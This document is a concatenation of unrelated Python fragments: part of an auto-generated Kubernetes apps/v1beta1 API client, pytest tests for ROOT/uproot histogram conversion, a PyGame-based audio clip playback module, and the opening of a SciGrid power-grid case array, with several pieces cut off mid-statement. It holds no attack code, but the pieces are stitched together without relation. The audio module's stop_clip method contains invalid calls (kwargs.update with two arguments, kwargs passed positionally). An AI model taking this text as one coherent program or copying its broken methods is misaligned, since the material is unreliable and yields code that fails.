0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0253486, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
<filename>kubernetes/client/apis/apps_v1beta1_api.py # coding: utf-8 """ Kubernetes No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) OpenAPI spec version: v1.7.1 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import sys import os import re # python 2 and python 3 compatibility library from six import iteritems from ..configuration import Configuration from ..api_client import ApiClient class AppsV1beta1Api(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): config = Configuration() if api_client: self.api_client = api_client else: if not config.api_client: config.api_client = ApiClient() self.api_client = config.api_client def create_namespaced_controller_revision(self, namespace, body, **kwargs): """ create a ControllerRevision This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_namespaced_controller_revision(namespace, body, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str namespace: object name and auth scope, such as for teams and projects (required) :param V1beta1ControllerRevision body: (required) :param str pretty: If 'true', then the output is pretty printed. :return: V1beta1ControllerRevision If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.create_namespaced_controller_revision_with_http_info(namespace, body, **kwargs) else: (data) = self.create_namespaced_controller_revision_with_http_info(namespace, body, **kwargs) return data def create_namespaced_controller_revision_with_http_info(self, namespace, body, **kwargs): """ create a ControllerRevision This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_namespaced_controller_revision_with_http_info(namespace, body, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str namespace: object name and auth scope, such as for teams and projects (required) :param V1beta1ControllerRevision body: (required) :param str pretty: If 'true', then the output is pretty printed. :return: V1beta1ControllerRevision If the method is called asynchronously, returns the request thread. """ all_params = ['namespace', 'body', 'pretty'] all_params.append('callback') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create_namespaced_controller_revision" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'namespace' is set if ('namespace' not in params) or (params['namespace'] is None): raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_controller_revision`") # verify the required parameter 'body' is set if ('body' not in params) or (params['body'] is None): raise ValueError("Missing the required parameter `body` when calling `create_namespaced_controller_revision`") collection_formats = {} resource_path = '/apis/apps/v1beta1/namespaces/{namespace}/controllerrevisions'.replace('{format}', 'json') path_params = {} if 'namespace' in params: path_params['namespace'] = params['namespace'] query_params = {} if 'pretty' in params: query_params['pretty'] = params['pretty'] header_params = {} form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['*/*']) # Authentication setting auth_settings = ['BearerToken'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='V1beta1ControllerRevision', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def create_namespaced_deployment(self, namespace, body, **kwargs): """ create a Deployment This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_namespaced_deployment(namespace, body, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str namespace: object name and auth scope, such as for teams and projects (required) :param AppsV1beta1Deployment body: (required) :param str pretty: If 'true', then the output is pretty printed. :return: AppsV1beta1Deployment If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.create_namespaced_deployment_with_http_info(namespace, body, **kwargs) else: (data) = self.create_namespaced_deployment_with_http_info(namespace, body, **kwargs) return data def create_namespaced_deployment_with_http_info(self, namespace, body, **kwargs): """ create a Deployment This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_namespaced_deployment_with_http_info(namespace, body, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str namespace: object name and auth scope, such as for teams and projects (required) :param AppsV1beta1Deployment body: (required) :param str pretty: If 'true', then the output is pretty printed. :return: AppsV1beta1Deployment If the method is called asynchronously, returns the request thread. """ all_params = ['namespace', 'body', 'pretty'] all_params.append('callback') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create_namespaced_deployment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'namespace' is set if ('namespace' not in params) or (params['namespace'] is None): raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_deployment`") # verify the required parameter 'body' is set if ('body' not in params) or (params['body'] is None): raise ValueError("Missing the required parameter `body` when calling `create_namespaced_deployment`") collection_formats = {} resource_path = '/apis/apps/v1beta1/namespaces/{namespace}/deployments'.replace('{format}', 'json') path_params = {} if 'namespace' in params: path_params['namespace'] = params['namespace'] query_params = {} if 'pretty' in params: query_params['pretty'] = params['pretty'] header_params = {} form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['*/*']) # Authentication setting auth_settings = ['BearerToken'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='AppsV1beta1Deployment', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def create_namespaced_deployment_rollback_rollback(self, name, namespace, body, **kwargs): """ create rollback of a DeploymentRollback This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_namespaced_deployment_rollback_rollback(name, namespace, body, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str name: name of the DeploymentRollback (required) :param str namespace: object name and auth scope, such as for teams and projects (required) :param AppsV1beta1DeploymentRollback body: (required) :param str pretty: If 'true', then the output is pretty printed. :return: AppsV1beta1DeploymentRollback If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.create_namespaced_deployment_rollback_rollback_with_http_info(name, namespace, body, **kwargs) else: (data) = self.create_namespaced_deployment_rollback_rollback_with_http_info(name, namespace, body, **kwargs) return data def create_namespaced_deployment_rollback_rollback_with_http_info(self, name, namespace, body, **kwargs): """ create rollback of a DeploymentRollback This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_namespaced_deployment_rollback_rollback_with_http_info(name, namespace, body, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str name: name of the DeploymentRollback (required) :param str namespace: object name and auth scope, such as for teams and projects (required) :param AppsV1beta1DeploymentRollback body: (required) :param str pretty: If 'true', then the output is pretty printed. :return: AppsV1beta1DeploymentRollback If the method is called asynchronously, returns the request thread. """ all_params = ['name', 'namespace', 'body', 'pretty'] all_params.append('callback') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create_namespaced_deployment_rollback_rollback" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if ('name' not in params) or (params['name'] is None): raise ValueError("Missing the required parameter `name` when calling `create_namespaced_deployment_rollback_rollback`") # verify the required parameter 'namespace' is set if ('namespace' not in params) or (params['namespace'] is None): raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_deployment_rollback_rollback`") # verify the required parameter 'body' is set if ('body' not in params) or (params['body'] is None): raise ValueError("Missing the required parameter `body` when calling `create_namespaced_deployment_rollback_rollback`") collection_formats = {} resource_path = '/apis/apps/v1beta1/namespaces/{namespace}/deployments/{name}/rollback'.replace('{format}', 'json') path_params = {} if 'name' in params: path_params['name'] = params['name'] if 'namespace' in params: path_params['namespace'] = params['namespace'] query_params = {} if
#!/usr/bin/env python """ Tests for the utilities module. .. codeauthor:: <NAME> <<EMAIL>>, Yale University """ import ctypes import logging import os from dataclasses import dataclass from pathlib import Path from typing import Any, Dict, Iterator, Tuple import numpy as np import pytest import uproot from pachyderm import histogram from pachyderm.typing_helpers import Hist # Setup logger logger = logging.getLogger(__name__) @pytest.fixture # type: ignore def retrieve_root_list(test_root_hists: Any) -> Iterator[Tuple[str, Any, Any]]: """Create an set of lists to load for a ROOT file. NOTE: Not using a mock since I'd like to the real objects and storing a ROOT file is just as easy here. The expected should look like: ``` {'mainList': OrderedDict([('test', Hist('test_1')), ('test2', Hist('test_2')), ('test3', Hist('test_3')), ('innerList', OrderedDict([('test', Hist('test_1')), ('test', Hist('test_2')), ('test', Hist('test_3'))]))])} ``` """ import ROOT # Create values for the test # We only use 1D hists so we can do the comparison effectively. # This is difficult because root hists don't handle operator== # very well. Identical hists will be not equal in some cases... hists = [] h = test_root_hists.hist1D for i in range(3): hists.append(h.Clone("{}_{}".format(h.GetName(), i))) l1 = ROOT.TList() l1.SetName("mainList") l2 = ROOT.TList() l2.SetName("innerList") l3 = ROOT.TList() l3.SetName("secondList") for h in hists: l1.Add(h) l2.Add(h) l3.Add(h) l1.Add(l2) # File for comparison. filename = os.path.join(os.path.dirname(os.path.realpath(__file__)), "testFiles", "testOpeningList.root") # Create the file if needed. if not os.path.exists(filename): current_directory = ROOT.TDirectory.CurrentDirectory() lCopy = l1.Clone("mainList") lSecondCopy = l3.Clone("secondList") # The objects will be destroyed when l is written. # However, we write it under the l name to ensure it is read correctly later f = ROOT.TFile(filename, "RECREATE") f.cd() lCopy.Write(l1.GetName(), ROOT.TObject.kSingleKey) lSecondCopy.Write(l3.GetName(), ROOT.TObject.kSingleKey) f.Close() current_directory.cd() # Create expected values # See the docstring for an explanation of the format. expected = {} inner_dict = {} main_list = {} second_list = {} for h in hists: inner_dict[h.GetName()] = h main_list[h.GetName()] = h second_list[h.GetName()] = h main_list["innerList"] = inner_dict expected["mainList"] = main_list expected["secondList"] = second_list yield (filename, l1, expected) # We need to call Clear() because we reference the same histograms in both the main list # the inner list. If we don't explicitly call it on the main list, it may be called on the # inner list first, which will then lead to the hists being undefined when Clear() is called # on the main list later. l1.Clear() @pytest.mark.ROOT class TestOpenRootFile: def test_open_file(self, logging_mixin: Any, retrieve_root_list: Any) -> None: """ Test for context manager for opening ROOT files. """ filename, root_list, expected = retrieve_root_list output: Dict[str, Any] = {} with histogram.RootOpen(filename=filename) as f: for name in ["mainList", "secondList"]: histogram._retrieve_object(output, f.Get(name)) logger.debug(f"{output}") # This isn't the most sophisticated way of comparison, but bin-by-bin is sufficient for here. # We take advantage that we know the structure of the file so we don't need to handle recursion # or higher dimensional hists. output_inner_list = output["mainList"].pop("innerList") expected_inner_list = expected["mainList"].pop("innerList") output_second_list = output.pop("secondList") expected_second_list = expected.pop("secondList") for (o, e) in [ (output["mainList"], expected["mainList"]), (output_inner_list, expected_inner_list), (output_second_list, expected_second_list), ]: for oHist, eHist in zip(o.values(), e.values()): logger.info(f"oHist: {oHist}, eHist: {eHist}") oValues = [oHist.GetBinContent(i) for i in range(0, oHist.GetXaxis().GetNbins() + 2)] eValues = [eHist.GetBinContent(i) for i in range(0, eHist.GetXaxis().GetNbins() + 2)] assert np.allclose(oValues, eValues) def test_failing_to_open_file(self, logging_mixin: Any) -> None: """ Test for raising the proper exception for a file that doesn't exist. """ fake_filename = "fake_filename.root" with pytest.raises(IOError) as exception_info: with histogram.RootOpen(filename=fake_filename): pass # Check that the right exception was thrown by proxy via the filename. assert "Failed" in exception_info.value.args[0] and f"{fake_filename}" in exception_info.value.args[0] @pytest.mark.ROOT class TestRetrievingHistgramsFromAList: def test_get_histograms_in_file(self, logging_mixin: Any, retrieve_root_list: Any) -> None: """ Test for retrieving all of the histograms in a ROOT file. """ (filename, root_list, expected) = retrieve_root_list output = histogram.get_histograms_in_file(filename=filename) logger.info(f"{output}") # This isn't the most sophisticated way of comparison, but bin-by-bin is sufficient for here. # We take advantage that we know the structure of the file so we don't need to handle recursion # or higher dimensional hists. output_inner_list = output["mainList"].pop("innerList") expected_inner_list = expected["mainList"].pop("innerList") output_second_list = output.pop("secondList") expected_second_list = expected.pop("secondList") for (o, e) in [ (output["mainList"], expected["mainList"]), (output_inner_list, expected_inner_list), (output_second_list, expected_second_list), ]: for oHist, eHist in zip(o.values(), e.values()): logger.info(f"oHist: {oHist}, eHist: {eHist}") oValues = [oHist.GetBinContent(i) for i in range(0, oHist.GetXaxis().GetNbins() + 2)] eValues = [eHist.GetBinContent(i) for i in range(0, eHist.GetXaxis().GetNbins() + 2)] assert np.allclose(oValues, eValues) def test_get_histograms_in_list(self, logging_mixin: Any, retrieve_root_list: Any) -> None: """ Test for retrieving a list of histograms from a ROOT file. """ (filename, root_list, expected) = retrieve_root_list output = histogram.get_histograms_in_list(filename, "mainList") # The first level of the output is removed by `get_histograms_in_list()` expected = expected["mainList"] # This isn't the most sophisticated way of comparison, but bin-by-bin is sufficient for here. # We take advantage that we know the structure of the file so we don't need to handle recursion # or higher dimensional hists. output_inner_list = output.pop("innerList") expected_inner_list = expected.pop("innerList") for (o, e) in [(output, expected), (output_inner_list, expected_inner_list)]: for oHist, eHist in zip(o.values(), e.values()): oValues = [oHist.GetBinContent(i) for i in range(0, oHist.GetXaxis().GetNbins() + 2)] eValues = [eHist.GetBinContent(i) for i in range(0, eHist.GetXaxis().GetNbins() + 2)] assert np.allclose(oValues, eValues) def test_get_non_existent_list(self, logging_mixin: Any, retrieve_root_list: Any) -> None: """ Test for retrieving a list which doesn't exist from a ROOT file. """ (filename, root_list, expected) = retrieve_root_list with pytest.raises(ValueError) as exception_info: histogram.get_histograms_in_list(filename, "nonExistent") assert "nonExistent" in exception_info.value.args[0] def test_retrieve_object(self, logging_mixin: Any, retrieve_root_list: Any) -> None: """Test for retrieving a list of histograms from a ROOT file. NOTE: One would normally expect to have the hists in the first level of the dict, but this is actually taken care of in `get_histograms_in_list()`, so we need to avoid doing it in the tests here. """ (filename, root_list, expected) = retrieve_root_list # Did we actually get histograms? Used when debugging ROOT memory issues that seem to occur after # an exception is raised... logger.debug(f"{root_list}, {expected}") output: Dict[str, Any] = {} histogram._retrieve_object(output, root_list) # Ignore second list expected.pop("secondList") assert output == expected @pytest.fixture # type: ignore def setup_histogram_conversion() -> Tuple[str, str, histogram.Histogram1D]: """Setup expected values for histogram conversion tests. This set of expected values corresponds to: >>> hist = ROOT.TH1F("test", "test", 10, 0, 10) >>> hist.Fill(3, 2) >>> hist.Fill(8) >>> hist.Fill(8) >>> hist.Fill(8) Note: The error on bin 9 (one-indexed) is just sqrt(counts), while the error on bin 4 is sqrt(4) because we filled it with weight 2 (sumw2 squares this values). """ expected = histogram.Histogram1D( bin_edges=np.linspace(0, 10, 11), y=np.array([0, 0, 0, 2, 0, 0, 0, 0, 3, 0]), errors_squared=np.array([0, 0, 0, 4, 0, 0, 0, 0, 3, 0]), ) hist_name = "rootHist" filename = os.path.join(os.path.dirname(os.path.realpath(__file__)), "testFiles", "convertHist.root") if not os.path.exists(filename): # Need to create the initial histogram. # This shouldn't happen very often, as the file is stored in the repository. import ROOT root_hist = ROOT.TH1F(hist_name, hist_name, 10, 0, 10) root_hist.Fill(3, 2) for _ in range(3): root_hist.Fill(8) # Write out with normal ROOT so we can avoid further dependencies fOut = ROOT.TFile(filename, "RECREATE") root_hist.Write() fOut.Close() return filename, hist_name, expected def check_hist(input_hist: histogram.Histogram1D, expected: histogram.Histogram1D) -> bool: """Helper function to compare a given Histogram against expected values. Args: input_hist (histogram.Histogram1D): Converted histogram. expected (histogram.Histogram1D): Expected histogram. Returns: bool: True if the histograms are the same. """ if not isinstance(input_hist, histogram.Histogram1D): h = histogram.Histogram1D.from_existing_hist(input_hist) else: h = input_hist # Ensure that there are entries assert len(h.bin_edges) > 0 # Then check the actual values np.testing.assert_allclose(h.bin_edges, expected.bin_edges) assert len(h.x) > 0 np.testing.assert_allclose(h.x, expected.x) assert len(h.y) > 0 np.testing.assert_allclose(h.y, expected.y) assert len(h.errors) > 0 np.testing.assert_allclose(h.errors, expected.errors) return True @pytest.mark.ROOT # type: ignore def test_ROOT_hist_to_histogram(setup_histogram_conversion: Any) -> None: """ Check conversion of a read in ROOT file via ROOT to a Histogram object. """ filename, hist_name, expected = setup_histogram_conversion # Setup and read histogram import ROOT fIn = ROOT.TFile(filename, "READ") input_hist = fIn.Get(hist_name) assert check_hist(input_hist, expected) is True # Cleanup fIn.Close() def test_uproot_hist_to_histogram(setup_histogram_conversion: Any) -> None: """ Check conversion of a read in ROOT file via uproot to a Histogram object. """ filename, hist_name, expected = setup_histogram_conversion # Retrieve the stored histogram via uproot uproot_file = uproot.open(filename) input_hist = uproot_file[hist_name] assert check_hist(input_hist, expected) is True
# _________ .__ __ .__ # \_ ___ \ ____ _____ ______ ____ _____|__|/ |_|__| ____ ____ # / \ \/ / _ \ / \\____ \ / _ \/ ___/ \ __\ |/ _ \ / \ # \ \___( <_> ) Y Y \ |_> > <_> )___ \| || | | ( <_> ) | \ # \______ /\____/|__|_| / __/ \____/____ >__||__| |__|\____/|___| / # \/ \/|__| \/ \/ """ Signifier module to manage the audio clip playback. """ from __future__ import annotations import os import sys import random import schedule from threading import Thread from src.sigprocess import ModuleProcess from src.sigmodule import SigModule from src.clip import Clip import src.clipUtils as clipUtils from src.utils import plural # Allows PyGame to run without a screen os.environ["SDL_VIDEODRIVER"] = "dummy" # Silence PyGame greeting mesage -- currently not working stdout = sys.__stdout__ stderr = sys.__stderr__ sys.stdout = open(os.devnull, "w") sys.stderr = open(os.devnull, "w") import pygame as pg sys.stdout = stdout sys.stderr = stderr class Composition(SigModule): """ Audio playback composition manager module. """ def __init__(self, name: str, config: dict, *args, **kwargs) -> None: super().__init__(name, config, *args, **kwargs) clipUtils.logger = self.logger def create_process(self): """ Called by the module's `initialise()` method to return a module-specific object. """ self.process = CompositionProcess(self) class CompositionProcess(ModuleProcess, Thread): """ Controls the playback of an audio clip library. """ def __init__(self, parent: Composition) -> None: super().__init__(parent) # Composition assets self.clip_event = pg.USEREVENT + 1 self.channels = None self.collections = {} self.current_collection = {} self.base_path = self.config.get("base_path") self.fade_in = self.config.get("fade_in_ms", 1000) self.fade_out = self.config.get("fade_out_ms", 2000) self.mix_volume = self.config.get('mix_volume', 0.5) self.inactive_pool = set() self.active_pool = set() self.active_jobs = {} self.jobs = self.config["jobs"] self.jobs_dict = { "collection": self.collection_job, "clip_selection": self.clip_selection_job, "volume": self.volume_job, } if self.init_mixer() and self.init_library(): schedule.logger.setLevel('INFO') if self.parent_pipe.writable: self.parent_pipe.send("initialised") def init_mixer(self) -> bool: """ Initialises PyGame audio mixer. """ self.logger.debug(f'Initialising audio mixer using ' f'[{self.config.get("audio_engine", "alsa").upper()}] audio engine...') pg.mixer.pre_init( frequency=self.config["sample_rate"], size=self.config["bit_size"], channels=1, buffer=self.config["buffer"]) try: pg.mixer.init() except pg.error as exception: self.failed(f'[init_mixer] {exception}') return False pg.init() mix = pg.mixer.get_init() self.logger.info(f"Audio mixer initialised with {mix[1]}-bit samples " f"@ {mix[0]} Hz over {mix[2]} channel{plural(mix[2])}.") return True def init_library(self) -> bool: """ Initialises the Clip Manager with a library of Clips. """ self.logger.debug(f"Library path: {self.base_path}...") if not self.validate_library(self.config): self.failed("Specified audio library path is invalid.") return False titles = [ d for d in os.listdir(self.base_path) if os.path.isdir(os.path.join(self.base_path, d)) ] for title in sorted(titles): path = os.path.join(self.base_path, title) names = [] for f in os.listdir(path): if os.path.splitext(f)[1][1:] in self.config["valid_extensions"]: names.append(f) if len(names) != 0: self.collections[title] = {"path": path, "names": names} self.logger.debug(f'Initialised with ({len(self.collections)}) ' f'collection{plural(self.collections)}.') return True def pre_run(self) -> bool: """ Module-specific Process run preparation. """ self.collection_job() return True def mid_run(self): """ Module-specific Process run commands. Where the bulk of the module's computation occurs. """ try: pg.mixer.get_init() schedule.run_pending() self.check_clip_events() except pg.error as exception: self.failed(exception) def pre_shutdown(self): """ Module-specific shutdown preparation. """ schedule.clear() try: pg.mixer.get_init() self.stop_all_clips() self.wait_for_silence() except pg.error as exception: self.logger.error(f'Could not release mixer: {exception}') pg.mixer.quit() pg.quit() if pg.mixer.get_init() is None: self.logger.info('Audio mixer successfully released.') else: self.logger.warning(f'Audio mixer still initialised while closing playback module.') def select_collection(self, **kwargs): """ Selects a collection from the library, prepares clips and playback pools.\n Will randomly select a collection if valid name is not supplied. """ name = kwargs.get("name", None) num_clips = kwargs.get("num_clips", self.config["default_pool_size"]) self.logger.debug( f'Importing {"random " if name is None else ""}collection ' f'{(str(name) + " ") if name is not None else ""}from library.' ) if name is not None and name not in self.collections: self.logger.warning( "Requested collection name does not exist. " "One will be randomly selected." ) name = None if name is None: name = random.choice(list(self.collections.keys())) path, names = (self.collections[name]["path"], self.collections[name]["names"]) self.logger.debug(f'Collection "{name}" with ({len(names)}) ' f'clip{plural(names)} loaded.') self.current_collection = {"title": name, "path": path, "names": names} # Build clips from collection to populate clip manager self.clips = set([Clip(path, name, self.config["categories"], self.logger) for name in names]) self.active_pool = set() if (pool := clipUtils.get_distributed(self.clips, num_clips, strict=self.config.get("strict_distribution", False))) is not None: self.inactive_pool = pool if self.channels is not None: for chan in self.channels: chan.stop() self.channels = self.assign_channels(self.inactive_pool, 'clear') clipUtils.init_sounds(self.inactive_pool, self.channels) self.metrics_pusher.update(f"{self.module_name}_collection", name) self.logger.info(f'Now playing collection "{name}" with ' f'({len(pool)}) clip{plural(pool)} selected.') return self.current_collection else: self.logger.error( f'Failed to retrieve a collection "{name}"! ' f"Audio files might be corrupted.") return None def assign_channels(self, clip_set: set, *args) -> dict: """ Return dict of channels, where key=(index) and value=(channel object). Updates the mixer if there aren't enough channels """ channels = {} num_wanted = len(clip_set) if 'clear' in args: self.logger.debug('Clearing mixer before building new clips...') pg.mixer.set_num_channels(0) num_chans = pg.mixer.get_num_channels() # Update the audio mixer channel count if required if num_chans != num_wanted: self.logger.debug(f'Mixer has ({num_chans}) channel{plural(num_chans)}. ({num_wanted}) are needed.') pg.mixer.set_num_channels(num_wanted) num_chans = pg.mixer.get_num_channels() self.logger.debug(f"Mixer now assigned ({num_chans}) channel{plural(num_chans)}.") for i in range(num_chans): channels[i] = pg.mixer.Channel(i) channels[i].set_volume(self.mix_volume) return channels # ---------------- # Clip management # ---------------- def stop_random_clip(self): """ Stop a randomly selected audio clip from the active pool. """ self.stop_clip() def wait_for_silence(self): """ Holds up the thread until all channels have faded out. """ if pg.mixer.get_init() and pg.mixer.get_busy(): self.logger.debug(f'Waiting for audio mixer ' f'to release all channels...') block_time = self.fade_out / 1000 + 0.5 self.poll_control(block_for = block_time, abort_event = lambda: (not pg.mixer.get_busy())) self.check_clip_events() if pg.mixer.get_busy(): self.logger.warning('Mixer still busy after waiting for silence. ' 'Forcing playback to stop on all channels.') self.stop_all_clips('now') else: self.logger.debug("Mixer now silent.") else: self.logger.debug(f'Mixer not initialised or busy. Ignoring request ' f'to wait for silence.') def stop_all_clips(self, *args, **kwargs): """ Tell all active clips to stop playing, emptying the mixer of\ active channels.\n `fade_time=(int)` the number of milliseconds active\ clips should take to fade their volumes before stopping playback.\ If no parameter is provided, the clip_manager's `fade_out`\ value from the config.json will be used.\n Use 'disable_events=True'\ to prevent misfiring audio jobs that use clip end events to launch more. """ fade = kwargs.get("fade_time", self.fade_out) if pg.mixer.get_init(): if pg.mixer.get_busy(): if fade == 0 or 'now' in args: self.logger.debug(f"Stopping audio clips immediately.") pg.mixer.stop() else: self.logger.debug(f"Stopping audio clips with {fade}ms fade...") if kwargs.get("disable_events", False) is True: self.clear_events() pg.mixer.fadeout(fade) else: self.logger.info(f'Ignoring request to fade out clips, mixer is empty.') self.check_clip_events() def check_clip_events(self): """ Check for audio playback completion events, call the clip manager to clean them up. """ for event in pg.event.get(): if event.type == self.clip_event: self.check_finished() def check_finished(self) -> set: """ Checks active pool for lingering Clips finished playback, and moves them to the inactive pool. Returns a set containing any clips moved. """ finished = set() for clip in self.active_pool: if not clip.channel.get_busy(): finished.add(clip) self.logger.debug(f'Clip "{clip.name}" ENDED on channel ({clip.index}).') if len(finished) > 0: self.move_to_inactive(finished) return finished def move_to_inactive(self, clips: set): """ Supplied list of Clip(s) are moved from active to inactive pool. """ for clip in clips: self.active_pool.remove(clip) self.inactive_pool.add(clip) def move_to_active(self, clips: set): """ Supplied list of Clip(s) are moved from inactive to active pool. """ for clip in clips: self.inactive_pool.remove(clip) self.active_pool.add(clip) def play_clip(self, clips=set(), **kwargs) -> set: """ Start playback of Clip(s) from the inactive pool, selected by object, name, category, or at random. Clips started are moved to the active pool and are returned as a set. """ if len(clips) == 0: clips = clipUtils.get_clip(self.inactive_pool, **kwargs) started = set([c for c in clips if c.play(**kwargs) is not None]) self.move_to_active(started) return started def stop_clip(self, clips=set(), *args, **kwargs) -> set: """ Stop playback of Clip(s) from the active pool, selected by object, name, category, or at random. Clips stopped are moved to the inactive pool and are returned as a set. `'balance'` in args will remove clips based on the most active category, overriding category in arguments if provided. """ fade = kwargs.get("fade", self.fade_out) if len(clips) == 0: # Finds the category with the greatest number of active clips. if "balance" in args: contents = clipUtils.get_contents(self.active_pool) clips = contents[max(contents, key=contents.get)] kwargs.update("category", None) clips = clipUtils.get_clip(self.active_pool, kwargs) stopped = set([c for c in clips if c.stop(fade) is not None]) self.move_to_inactive(stopped) return stopped def modulate_volumes(self, **kwargs): """ Randomly modulate the Channel volumes for all Clip(s) in the active pool.\n - "speed=(int)" is the maximum volume jump per tick as a percentage of
<reponame>thanever/SOC from numpy import array def scigrid_2011_01_04_06(): ppc = {"version": '2'} ppc["baseMVA"] = 100.0 ppc["bus"] = array([ [586, 3, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [589, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [590, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [593, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [594, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [595, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [597, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [598, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [599, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [600, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [601, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [602, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [603, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [607, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [608, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [609, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [610, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [611, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [612, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [613, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [614, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [616, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [617, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [618, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [619, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [621, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [623, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [624, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [628, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [629, 2, 